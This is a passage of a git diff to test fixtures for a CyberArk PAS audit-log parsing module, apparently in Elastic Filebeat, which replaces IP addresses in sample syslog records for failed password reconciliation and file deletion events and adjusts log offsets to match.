         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Delete File",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 13:06:40</Timestamp>\n    <IsoTimestamp>2021-03-11T21:06:40Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>52</MessageID>\n    <Desc>Delete File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Delete File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-PSMConnect</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Delete File</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"PSMConnect\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"35.192.121.42\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 13:06:40</Timestamp>\n    <IsoTimestamp>2021-03-11T21:06:40Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>52</MessageID>\n    <Desc>Delete File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Delete File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-PSMConnect</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Delete File</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"PSMConnect\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"67.43.156.12\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
@@ -268,11 +266,11 @@
         "event.module": "cyberarkpas",
         "event.severity": 2,
         "event.timezone": "-02:00",
-        "file.path": "Root\\Operating System-WinDomain-35.192.121.42-PSMConnect",
+        "file.path": "Root\\Operating System-WinDomain-67.43.156.12-PSMConnect",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 6037,
+        "log.offset": 6035,
         "log.syslog.priority": "5",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -322,7 +320,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 8223,
+        "log.offset": 8217,
         "log.syslog.priority": "5",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -372,7 +370,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 10117,
+        "log.offset": 10111,
         "log.syslog.priority": "5",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -426,7 +424,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 12005,
+        "log.offset": 11999,
         "log.syslog.priority": "5",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -480,7 +478,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 14321,
+        "log.offset": 14315,
         "log.syslog.priority": "5",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log b/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log
index 2a5483207bfe..a32fa542b335 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log
@@ -1,9 +1,9 @@
-<7>1 2021-03-11T21:12:22Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 13:12:22</Timestamp>\n    <IsoTimestamp>2021-03-11T21:12:22Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=34.66.114.180;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615497142\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:12:22","IsoTimestamp":"2021-03-11T21:12:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615497142"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-14T13:18:15Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:18:15</Timestamp>\n    <IsoTimestamp>2021-03-14T13:18:15Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"2\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615727895\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:18:15","IsoTimestamp":"2021-03-14T13:18:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615727895"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-11T21:12:22Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 13:12:22</Timestamp>\n    <IsoTimestamp>2021-03-11T21:12:22Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=81.2.69.143;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615497142\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:12:22","IsoTimestamp":"2021-03-11T21:12:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=81.2.69.143;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615497142"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-14T13:18:15Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:18:15</Timestamp>\n    <IsoTimestamp>2021-03-14T13:18:15Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=2;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"2\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615727895\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:18:15","IsoTimestamp":"2021-03-14T13:18:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=81.2.69.143;retriescount=2;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615727895"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
 <7>1 2021-03-14T13:46:13Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:46:13</Timestamp>\n    <IsoTimestamp>2021-03-14T13:46:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n</Reason>\n    <ExtraDetails>address=34.123.103.115;username=testark;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:46:13","IsoTimestamp":"2021-03-14T13:46:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-14T14:49:11Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 07:49:11</Timestamp>\n    <IsoTimestamp>2021-03-14T14:49:11Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"3\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615733350\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 07:49:11","IsoTimestamp":"2021-03-14T14:49:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615733350"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-15T10:12:18Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:12:18</Timestamp>\n    <IsoTimestamp>2021-03-15T10:12:18Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating 